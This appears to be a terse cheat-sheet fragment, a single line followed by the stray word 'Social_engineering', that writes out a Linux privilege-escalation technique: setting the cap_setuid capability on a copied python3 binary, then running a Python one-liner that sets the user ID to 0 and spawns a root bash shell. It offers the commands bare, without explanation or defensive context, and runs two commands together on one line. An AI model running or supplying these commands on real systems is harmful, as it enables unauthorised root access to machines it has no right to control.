setcap cap_setuid+ep /absolute/path/to/copied/python3 python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
Social_engineering